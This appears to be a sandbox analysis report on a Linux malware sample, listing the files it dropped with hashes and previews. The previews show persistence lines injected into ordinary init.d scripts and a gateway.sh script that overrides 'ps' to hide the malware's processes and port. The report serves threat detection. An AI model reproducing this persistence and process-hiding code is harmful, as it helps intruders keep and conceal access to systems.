/usr/bin/vmtoolsd --test > /dev/null \|\| exit 1.

/etc/init.d/plymouth

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.3052027136710675
Encrypted:	false
SSDEEP:	24:1sqE3A2EYVwMwRwDTMBgV2APfcVwAPYIpPgfS+VGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzQAsVwAgGYfdVz58Y9f5v
MD5:	2B23E2A5868129F5B68D4465E1FBA27A
SHA1:	8781CE140244ABA8178CCC20B50AB3C252D82A1F
SHA-256:	5D49F02BB6C8C031EA02F67ABFB812EB75425058AD30F44FAB85A9463D2DB1CC
SHA-512:	8DBA742FB4B66C0799E66FA5E070161E2EDBA95A0789A06F51910D659F51E6313D32072078A44B7D2A46CD18B63036F07FBFBD8AEF90843643860424FED398D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash)....SPLASH="true"....;;....nosplash\|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system-mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV

/etc/init.d/plymouth-log

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	787
Entropy (8bit):	5.274418902272115
Encrypted:	false
SSDEEP:	12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCR6D02ygvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgTHygvR4MLoVS
MD5:	92B74D7357C759DB635940F9DBE7A5E8
SHA1:	88C813B379F01849C7A709BF47D8C40AB2A25345
SHA-256:	DBDAB3736BE330D3CC39A75E100F6FB8D9094413A7D24CAC22A8BE39DE25D3C3
SHA-512:	405A8103CE19E154E58A9B0D26C888807F1DE5B3A98EF8C66DF31F3113542215004FD4CD9783C021ED27FEC165B4605CF6B92C141AD9E2BE4872C1D80A34B6E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system-mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop\|restart\|force-reload)....;;...*)...echo "Usage: ${0} {start\|stop\|restart\|force-reload}" >&2...exit 1...;;.esac..exit 0..

/etc/init.d/procps

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.25253518776668
Encrypted:	false
SSDEEP:	12:atdRDNeBuYrBMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLEx/25+Z+nMfTWTeCKa3VfhL69z0
MD5:	BEA2BDFD5F7688D4F6E313DC63CA499D
SHA1:	4D6764F461EE096E83A5F5923ED8472A94526E95
SHA-256:	8D2D9E87F61D6D84EFF365927CB97A21EBFC3C9B9BDA48D13858D285AD332466
SHA-512:	932B314974F2AA88FC3E1292729F166EC1459B2951F476F9E9CFA00AC0A36B0687C3CC1BED94B968BBAAF47C3D679CFBE152DFE984E54306800FB85A16DE0F3D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system \|\| STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..

/etc/init.d/rsync

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4639
Entropy (8bit):	5.249855326047257
Encrypted:	false
SSDEEP:	96:jdRMpo498RXFzyb1U0lKRuHp8gXGHoNURkx:jdRMpJ98g1U0c8JxWINUmx
MD5:	BBBAC3DC084FCC76813396852B0383FE
SHA1:	675F156F5AAF3BFA73C23A1478680F9769D19926
SHA-256:	BF77774A109F072532F634BCC63FB7DA005BEB0D553418FA42DED906F3025EFF
SHA-512:	C7F9AE322C14643F6D711B4B20AD009522B3FE02E986CFB5F839717144BF795E70E17A2745D24E74C4CA76922FF8ED0C1D413F7CEBDECA25CFC52AE4EDE04FA7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system-mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue\|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail

/etc/init.d/rsyslog

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2899
Entropy (8bit):	5.275562121366292
Encrypted:	false
SSDEEP:	48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ie3nLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ie3nR5JT
MD5:	5D640A7C6908172899411BF2B8B1DE9C
SHA1:	B3980052CC12A5ACF1DD34D134CD822CAE09C63A
SHA-256:	A40550FEDDF8DB933722514358F364F7CCD50E9EFF123F4F408575BFB0865DE2
SHA-512:	E0AAF4ACC9F2707B6B191A5BDB36711F43D5C1890D5FFD614C03C2525E31F7993BE0308B865DA41B6D4E83A32759AEE91D8B94C293AD6174C2D94633980B3766
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] \|\| exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st

/etc/init.d/saned

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2293
Entropy (8bit):	5.0050970590485715
Encrypted:	false
SSDEEP:	24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHvdNw5G/9yNuFimjBklJJq5MxnR5/2F:e7Y0u/i5t7RbHwG/9diHlrXnL/iOs1
MD5:	E26E346029E7C03BC1EF969368CF6A1D
SHA1:	7AD4BCFDA2907E9EED7C2DC81820EABFC0132AE7
SHA-256:	B26A28FBDDDCA0E1A9232CF7719860044CB58D34E11AEDC1D53C9D57A689616A
SHA-512:	FBAF8DA2CA6CA008E3D3F1F93C6FAF794A0D62ECD161770F0D00A48697AC190BAB80A13EA1B2D18A4CFD35FA33BEB8891848D5DA67D1DAD2246995CD44B45910
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON \|\| exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system-mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N

/etc/init.d/screen-cleanup

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	5.007351824676895
Encrypted:	false
SSDEEP:	24:c26Nr+XEgBYxABoO21p4rqeYCRjeyvcsTN/RGT7d/LGld/7K9jp:cPQoO23+qeYSjeybRRGHdTGld/7K9jp
MD5:	2CB1D1EE81FD07E07C103CB77A254958
SHA1:	1B94DFA21FF802A7176767B4F0B5EEC16057B5EC
SHA-256:	6DEA1801FFE07EB969A54FA572A6A63C80D570CEABAC7F14BFD51DD40E67FD30
SHA-512:	48556EE1B364DA2B128006C2755F1C665559C2216ECA1CE06D7972A158CD27AB075859ABD842D7C2F118175A5616B6FE5B6288866A55B050A465E699EB67C491
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen \|\| exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR \|\| ! test -d $SCREENDIR; then./lib/system-mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "

/etc/init.d/spice-vdagent

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2519
Entropy (8bit):	4.741374235420371
Encrypted:	false
SSDEEP:	48:DFZazGMU+rI4CXyUH0I6zroGW//AhrHoGx//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGWQRHoGxQuiIngczVII
MD5:	652E57DD61B8A64F80D9CCCD751E4476
SHA1:	1C9E3D8CBCD6F9E6B1B3994D8246C89A52BA84CE
SHA-256:	49FEFA6609A75C4A3624B556F2593A15B2F9E0C173BFB2233B90DBC8BF52E53D
SHA-512:	657C725D48D6A56929530EC68DB98895C4EB7F3A6C94E799FBA2BF48053883F8128C03F934A63E623340FD0433FE5222685CAC501D5C8D9B81317353649E382D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic

/etc/init.d/ssh

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4195
Entropy (8bit):	5.068394475077908
Encrypted:	false
SSDEEP:	96:jkXSV2xsYJrvcRyAHofonXHeyKyWUkO8IhQ:j1ouYJDc7IQXoXBIhQ
MD5:	C7F75670C4CBACFFCD3EE308F9EC9F4A
SHA1:	4D77E8C62706CB0601CB8031FB0368581E479792
SHA-256:	7E40FB227308DFE02D3F2EDF82B41D0FDF729A942D78D74C72EEA7A82669BE90
SHA-512:	39EB8A235611E0B6EC4C15D5C7D86274573A0C9DFD69E31D1297F50B992B0FF247382E20DAF02133BC7896B0530C215B5A1F870A6F214C9AF0DDB1F70C213CEA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd \|\| exit 0.( /usr/sbin/sshd -\? 2>&1 \| grep -q OpenSSH ) 2>/dev/null \|\| exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system-mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system-mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) \|\| [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system-mark..if [ "$1" = log_end_msg ]; then./lib/system-mark.. log_end_msg 0 \|\| true..fi..if ! run_by_init; then./lib/syst

/etc/init.d/udev

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	7281
Entropy (8bit):	4.982014475224516
Encrypted:	false
SSDEEP:	96:l7vIwGhwBoNNqeI4OyxwfPlBALWGGgRoG2davbKBJKCrrS2DvwvPmWGPmTbKBJKk:lOWoYiOVlz2B2daxqrS2zwGW51Wymj
MD5:	9C101DF581AD6E404FB99F3B974E743E
SHA1:	CF4A059360FEDD5F371C815772E2BAFC4532E997
SHA-256:	63F0156061B5B581C069F51ED8E3B0473CF796EA88A3BF4BE92B420D529B59AB
SHA-512:	4F7658321F7AC02F9D528088E8A572B8F8549C8FCC61366BDC43ACB61C9C216EBF597D78116A5DB4A42BDC0DC17A4AF6B55C068DB41BDC2DC661900B70A3EDE2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system-mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system-mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system-mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -

/etc/init.d/ufw

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	4.757250053076253
Encrypted:	false
SSDEEP:	48:1LleiFcd/nzngwPatTM/JrNWwj/Jb/SX9l:1BDFmXOQvJE
MD5:	EA501062EF1DD3FA29A5BC5479E85D5C
SHA1:	997CD2C9A15D23589A8862E2F521A6E40C807311
SHA-256:	90D6965642D81F9AF96BA403FA262381940E73011724178E6B72EC54955C0BCB
SHA-512:	95D16F0A742BA49AA8ABEA1F448F602B4F00ED3DBDD51B25E71C79A68B9F07926B252A9B66D1BFFB760247BD4C605CCD9B4ACCF3ED1D1755A7886651AC6C396D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] \|\| exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system-mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] \|\| [ "$ENABLED" = "YES" ]; then./lib/system-mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` \|\| error="$?". if [ "$error" = "0" ]; then./lib/system-mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system-mark. echo "$output" \| while read

/etc/init.d/unattended-upgrades

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	5.323775798950294
Encrypted:	false
SSDEEP:	24:aMXni+12wpFKFOGofwvlf/HNVKowwflHBhF/7Px1gr:bni23FKFpbt3GnoHBDbx2
MD5:	0BAD7D02A34912B684C93C71BFD19757
SHA1:	688CF612860E3C7125D34B63F7EF584DC65E4550
SHA-256:	FF796642243AF8B1492D63FF16F761AE942A4AE7CCFA17A05E3CF533B0D6E4DB
SHA-512:	D806A1D5B8AD9AA0A51841825DA8ACD4DA299D331874CD6FD777BCD6802B8BC7498B118B6D85F7E1793749EDCD3ABBD57EA78620226D34E43DA3AE1EE73BA684
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system-mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.

/etc/init.d/uuidd

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	5.209136415739334
Encrypted:	false
SSDEEP:	24:aNmC4ozLk8BZa8LNfwa0aDEPLu5CB5ZM5AHdwi/mqT0KtOC:3VozBjdh0a4PLuIBvMGwitIKtl
MD5:	A18F61759309F7DAE1CF4D379B0DC2E0
SHA1:	38BB4BFF894D6973BC2B59145A28CD93FC2A2B26
SHA-256:	8750FAACA2F9E6ED50996EBA4C23F884241C27A375CCFE79801715044BEA7232
SHA-512:	18489A3A5A446A80D1EEB324AD9823480FF2C53AF1703D4DB6B3DE42A7901B0223135948FD5162F60418F1AB7B7AA1CB3D3CA5C7D1E9E05F6048204DD913D6FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system-mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&

/etc/init.d/x11-common

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2911
Entropy (8bit):	4.894244496059908
Encrypted:	false
SSDEEP:	48:ZETewCRgFkV5ZSVwxcRypF1vrBy9DuIpPX5uCXAepm1L3/WAhyC76XGMgH3:SggFkViVNePT09DuYX5HX3aLdqX8
MD5:	E39C2FE947515C58470F91A5A6D1ED5B
SHA1:	00C7881A33ED0425C236C9544BD43E7BC9AE46DD
SHA-256:	37CCB9BB9C51FEB17B9943BB7DF42E8E03342F5611EC649E5C6E5A87A5A2840D
SHA-512:	AB26218676CEA2C319F29911650AA98C2E7D5578E9E2130D44997FDDE2E59765E1AAC52E0EE2C466E231B55AFFCA92B9C0A67A8381725D5433C3392DE04FF7F3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system-mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system-mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] \|\| [ -h $DIR ]; then./lib/system-mar

/etc/profile.d/bash_cfg.sh

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.261725074756386
Encrypted:	false
SSDEEP:	3:TKH/binKE:siKE
MD5:	BE6E09DEC0A6249FD83851DAF92AE627
SHA1:	9FF81BB38A0FD5432575455D7D8334BD8D983CF7
SHA-256:	44BDD8B7F00094E163540A2B8C3CF973E72499BAA20B78F8051E2422163E1D0D
SHA-512:	CCF2BDC30F45A132DBDBBF1F008A06525B7EE4A46F09A11025BA05A55835F67356DBB4F8E826AFB28C73AFE5653C09C7CEAA082A2194A0D7C78BE101A4AD1F30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash./etc/profile.d/bash_cfg

/etc/profile.d/gateway.sh

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	Bourne-Again shell script, ASCII text executable, with very long lines (910)
Category:	dropped
Size (bytes):	6339
Entropy (8bit):	4.81594655854157
Encrypted:	false
SSDEEP:	192:sjahyOjP3ECqh8te6jahyOjP3ECqh8teUjahyOjP3ECqh8te0jahyOjP3ECqh8tC:0GYoWOCy
MD5:	0230E4FE16606AAE9D3402854BD1A14C
SHA1:	031BD877D9D0DE6369E4177AF9088442FC8189E1
SHA-256:	6ABC0901DF8BDB5F13EF92E2D5AD2EC6CF579D0F5FF1677E7D6E2606CB75A0B7
SHA-512:	78818DA84ADA4D317FC31BBD15C85D84D6AE341169E79A08212059737490D339EE71C0073ABE031CA0D13FC4B289EEBFD134CE11CE95674A5630501C8B8F5B9E
Malicious:	true
Preview:	#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" \| sed -e '/32676/d');proc_name=$(echo "$proc_name" \| sed -e '/dns-tcp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaoff.service/d');proc_name=$(echo "$proc_name" \| sed -e '/System.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" \| sed -e '/32676/d');proc_name=$(echo "$proc_name" \| sed -e '/.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/libgdi.so.0.8.1/d');proc_name=$(echo "$proc_name" \| sed -e '/opt.services.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/system-mark/d');proc_name=$(echo "$proc_name" \| sed -e '/ifconfig.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/sleep/d');proc_name=$(echo "$proc_name" \| sed -e '/seeintlog/d');proc_name=$(echo "$proc_name" \| sed -e '/bash_cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/Ww0lpzmYHO.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" \| sed -e '/3267

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
